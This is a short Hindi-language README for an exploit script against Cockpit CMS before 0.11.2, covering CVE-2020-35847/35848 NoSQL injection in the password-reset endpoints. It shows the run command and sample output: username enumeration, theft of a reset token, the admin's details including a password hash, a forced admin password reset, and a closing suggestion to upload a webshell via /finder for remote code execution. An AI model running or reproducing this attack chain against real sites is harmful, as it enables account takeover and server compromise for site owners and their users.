
CVE-2020-35847, CVE-2020-35848: खाता अधिग्रहण
Cockpit CMS संस्करण 0.11.2 से पहले /auth/resetpassword और /auth/newpassword में NoSQL इंजेक्शन भेद्यता के प्रति संवेदनशील है, जो पासवर्ड रीसेट टोकन निकालने की अनुमति देता है, जिससे उपयोगकर्ता विवरणों की गणना के साथ-साथ पासवर्ड रीसेट भी संभव होता है।
यह पायथन स्क्रिप्ट सिस्टम पर उपयोगकर्ताओं की गणना करती है और पासवर्ड रीसेट करती है।
python3 exploit.py -u http://cockpit-site-url
स्क्रिप्ट पहले सिस्टम पर उपयोगकर्ताओं की गणना करती है।
[+] http://cockpit-site-url: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) :
[+] Users Found : ['admin', 'user1', 'user2', 'user3']
फिर आप चुन सकते हैं कि किस उपयोगकर्ता के बारे में अधिक जानकारी एकत्र करनी है। यह उस उपयोगकर्ता के लिए रीसेट टोकन भी उत्पन्न करता है, जो पासवर्ड रीसेट में एक महत्वपूर्ण आवश्यकता है।
[-] Get user details For : admin
[+] Finding Password reset tokens
Tokens Found : ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] Obtaining user information
-----------------Details--------------------
[*] user : admin
[*] name : Admin
[*] email : [email protected]
[*] active : True
[*] group : admin
[*] password : $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
[*] i18n : en
[*] _created : 1621655201
[*] _modified : 1621655201
[*] _id : 60a87ea165343539ee000300
[*] _reset_token : rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
[*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------
अंत में आप उपयोगकर्ता का पासवर्ड रीसेट करना चुन सकते हैं।
[+] Do you want to reset the passowrd for admin? (Y/n): y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is:
Username : admin
Password : new_random_password
फिर आप RCE प्राप्त करने के लिए /finder घटक पर एक वेबशेल अपलोड करना चुन सकते हैं।